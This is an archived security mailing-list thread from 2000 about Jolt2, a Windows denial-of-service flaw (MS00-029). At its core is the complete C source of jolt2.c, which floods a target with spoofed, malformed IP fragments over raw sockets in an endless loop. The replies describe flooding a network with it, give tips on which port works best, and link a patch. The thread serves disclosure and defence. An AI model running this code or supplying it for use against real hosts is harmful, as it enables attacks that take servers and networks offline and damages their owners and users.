OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
Subject: Re: Windows DoS code (jolt2.c)
From: Mats Remman (matsHINUX.HIN.NO)
Date: Fri May 26 2000 - 11:24:48 CDT

-p 139 works on most computers, even amiga..
it made my dualp133 get pretty loaded when running it..

patches against it was published by ms a week ago..
url = http://www.microsoft.com/Downloads/Release.asp?ReleaseID=20829

Mats Remman
Student at Narvik College of Technology, NORWAY

----- Original Message -----
From: "Craig Williams" <craig.williamsHOOKRISE.COM>
To: <win2ksecadviceLISTSERV.NTSECURITY.NET>
Sent: Friday, May 26, 2000 4:10 PM
Subject: Re: Windows DoS code (jolt2.c)

> I had the same result, in testing out internal 10meg lan took
> a beating while the code was running.
>
> This can do serious damage to NT Web Servers !
>
> Does this code only attack one port ? It appears to allow a port
> to be specified -
>
> What is the concept behind this exploit ?
>
> Craig
>
> > -----Original Message-----
> > From: SMILER [mailto:smilerVXD.ORG]
> > Sent: 26 May 2000 14:12
> > To: win2ksecadviceLISTSERV.NTSECURITY.NET
> > Subject: Re: Windows DoS code (jolt2.c)
> >
> >
> > This code does more then taking a windoze box to it knees !!
> > Well I am in a
> > network where we´ve got a 128k link and I used my shell
> > account in the ISP
> > with a really fast link to jolt one of the machines in my
> > network. As soon
> > as I pressed ENTER I lost connectivity in the whole
> > network...I couldn´t
> > even try to stop the jolt...fortunately I had a backup isdn
> > connection that
> > I used to stop the process !! Amazing flood !!!
> > My point is...how could I protect my network from beeing
> > flooded by someone
> > using such a powerfull tool ?? Even if I use a packet filter
> > in the entering
> > of my network I get flooded cause my router will get 100%
> > inbound traffic !!
> > The only way that I can think of is asking my provider to re-route the
> > traffic from the jolt source to a "dead-end" somehow ! Any
> > suggestions ?
> >
> > smilervxd.org
> >
> > ----- Original Message -----
> > From: Steve <steveSECURESOLUTIONS.ORG>
> > To: <win2ksecadviceLISTSERV.NTSECURITY.NET>
> > Sent: Thursday, May 25, 2000 9:48 PM
> > Subject: Windows DoS code (jolt2.c)
> >
> >
> > > -----BEGIN PGP SIGNED MESSAGE-----
> > > Hash: SHA1
> > >
> > > Here is some proof of concept code for the Jolt2 DoS reported by
> > > BindView Razor Team (http://razor.bindview.com). Note, this code was
> > > not created by me, I am simply passing it on to the mailing list.
> > > Send all questions/problems to the author of the code,
> > > phonixmoocow.org
> > >
> > > Regards;
> > >
> > > Steve Manzuik
> > > Moderator
> > >
> > > - --------------snip----------------
> > >
> > >
> > >
> > > /*
> > > * File: jolt2.c
> > > * Author: Phonix <phonixmoocow.org>
> > > * Date: 23-May-00
> > > *
> > > * Description: This is the proof-of-concept code for the
> > > * Windows denial-of-serice attack described by
> > > * the Razor team (NTBugtraq, 19-May-00)
> > > * (MS00-029). This code causes cpu utilization
> > > * to go to 100%.
> > > *
> > > * Tested against: Win98; NT4/SP5,6; Win2K
> > > *
> > > * Written for: My Linux box. YMMV. Deal with it.
> > > *
> > > * Thanks: This is standard code. Ripped from lots of places.
> > > * Insert your name here if you think you wrote some of
> > > * it. It's a trivial exploit, so I won't take credit
> > > * for anything except putting this file together.
> > > */
> > >
> > > #include <stdio.h>
> > > #include <string.h>
> > > #include <netdb.h>
> > > #include <sys/socket.h>
> > > #include <sys/types.h>
> > > #include <netinet/in.h>
> > > #include <netinet/ip.h>
> > > #include <netinet/ip_icmp.h>
> > > #include <netinet/udp.h>
> > > #include <arpa/inet.h>
> > > #include <getopt.h>
> > >
> > > struct _pkt
> > > {
> > > struct iphdr ip;
> > > union {
> > > struct icmphdr icmp;
> > > struct udphdr udp;
> > > } proto;
> > > char data;
> > > } pkt;
> > >
> > > int icmplen = sizeof(struct icmphdr),
> > > udplen = sizeof(struct udphdr),
> > > iplen = sizeof(struct iphdr),
> > > spf_sck;
> > >
> > > void usage(char *pname)
> > > {
> > > fprintf (stderr, "Usage: %s [-s src_addr] [-p port] dest_addr\n",
> > > pname);
> > > fprintf (stderr, "Note: UDP used if a port is specified, otherwise
> > > ICMP\n");
> > > exit(0);
> > > }
> > >
> > > u_long host_to_ip(char *host_name)
> > > {
> > > static u_long ip_bytes;
> > > struct hostent *res;
> > >
> > > res = gethostbyname(host_name);
> > > if (res == NULL)
> > > return (0);
> > > memcpy(&ip_bytes, res->h_addr, res->h_length);
> > > return (ip_bytes);
> > > }
> > >
> > > void quit(char *reason)
> > > {
> > > perror(reason);
> > > close(spf_sck);
> > > exit(-1);
> > > }
> > >
> > > int do_frags (int sck, u_long src_addr, u_long dst_addr, int port)
> > > {
> > > int bs, psize;
> > > unsigned long x;
> > > struct sockaddr_in to;
> > >
> > > to.sin_family = AF_INET;
> > > to.sin_port = 1235;
> > > to.sin_addr.s_addr = dst_addr;
> > >
> > > if (port)
> > > psize = iplen + udplen + 1;
> > > else
> > > psize = iplen + icmplen + 1;
> > > memset(&pkt, 0, psize);
> > >
> > > pkt.ip.version = 4;
> > > pkt.ip.ihl = 5;
> > > pkt.ip.tot_len = htons(iplen + icmplen) + 40;
> > > pkt.ip.id = htons(0x455);
> > > pkt.ip.ttl = 255;
> > > pkt.ip.protocol = (port ? IPPROTO_UDP : IPPROTO_ICMP);
> > > pkt.ip.saddr = src_addr;
> > > pkt.ip.daddr = dst_addr;
> > > pkt.ip.frag_off = htons (8190);
> > >
> > > if (port)
> > > {
> > > pkt.proto.udp.source = htons(port|1235);
> > > pkt.proto.udp.dest = htons(port);
> > > pkt.proto.udp.len = htons(9);
> > > pkt.data = 'a';
> > > } else {
> > > pkt.proto.icmp.type = ICMP_ECHO;
> > > pkt.proto.icmp.code = 0;
> > > pkt.proto.icmp.checksum = 0;
> > > }
> > >
> > > while (1) {
> > > bs = sendto(sck, &pkt, psize, 0, (struct sockaddr *) &to,
> > > sizeof(struct sockaddr));
> > > }
> > > return bs;
> > > }
> > >
> > > int main(int argc, char *argv[])
> > > {
> > > u_long src_addr, dst_addr;
> > > int i, bs=1, port=0;
> > > char hostname[32];
> > >
> > > if (argc < 2)
> > > usage (argv[0]);
> > >
> > > gethostname (hostname, 32);
> > > src_addr = host_to_ip(hostname);
> > >
> > > while ((i = getopt (argc, argv, "s:p:h")) != EOF)
> > > {
> > > switch (i)
> > > {
> > > case 's':
> > > dst_addr = host_to_ip(optarg);
> > > if (!dst_addr)
> > > quit("Bad source address given.");
> > > break;
> > >
> > > case 'p':
> > > port = atoi(optarg);
> > > if ((port <=0) || (port > 65535))
> > > quit ("Invalid port number given.");
> > > break;
> > >
> > > case 'h':
> > > default:
> > > usage (argv[0]);
> > > }
> > > }
> > >
> > > dst_addr = host_to_ip(argv[argc-1]);
> > > if (!dst_addr)
> > > quit("Bad destination address given.");
> > >
> > > spf_sck = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);
> > > if (!spf_sck)
> > > quit("socket()");
> > > if (setsockopt(spf_sck, IPPROTO_IP, IP_HDRINCL, (char *)&bs,
> > > sizeof(bs)) < 0)
> > > quit("IP_HDRINCL");
> > >
> > > do_frags (spf_sck, src_addr, dst_addr, port);
> > > }
> > >
> > > -----BEGIN PGP SIGNATURE-----
> > > Version: PGPfreeware 6.5.3 for non-commercial use
> <http://www.pgp.com>
> >
> > iQA/AwUBOS2ReDV9eGvIXwM6EQLOzgCgqF+8K+s95q7PXp6WE6HXFJVKXgMAn1ek
> > IAkI+Hv0ul66TxRmIJP1LqRH
> > =sSSM
> > -----END PGP SIGNATURE-----
> >
> > _____________________________________________________________________
> > ** TO UNSUBSCRIBE, send the command "UNSUBSCRIBE win2ksecadvice"
> > ** FOR A WEEKLY DIGEST, send the command "SET win2ksecadvice DIGEST"
> > SEND ALL COMMANDS TO: listservlistserv.ntsecurity.net
> >
>
> _____________________________________________________________________
> ** TO UNSUBSCRIBE, send the command "UNSUBSCRIBE win2ksecadvice"
> ** FOR A WEEKLY DIGEST, send the command "SET win2ksecadvice DIGEST"
> SEND ALL COMMANDS TO: listservlistserv.ntsecurity.net
>
> _____________________________________________________________________
> ** TO UNSUBSCRIBE, send the command "UNSUBSCRIBE win2ksecadvice"
> ** FOR A WEEKLY DIGEST, send the command "SET win2ksecadvice DIGEST"
> SEND ALL COMMANDS TO: listservlistserv.ntsecurity.net

_____________________________________________________________________
** TO UNSUBSCRIBE, send the command "UNSUBSCRIBE win2ksecadvice"
** FOR A WEEKLY DIGEST, send the command "SET win2ksecadvice DIGEST"
SEND ALL COMMANDS TO: listservlistserv.ntsecurity.net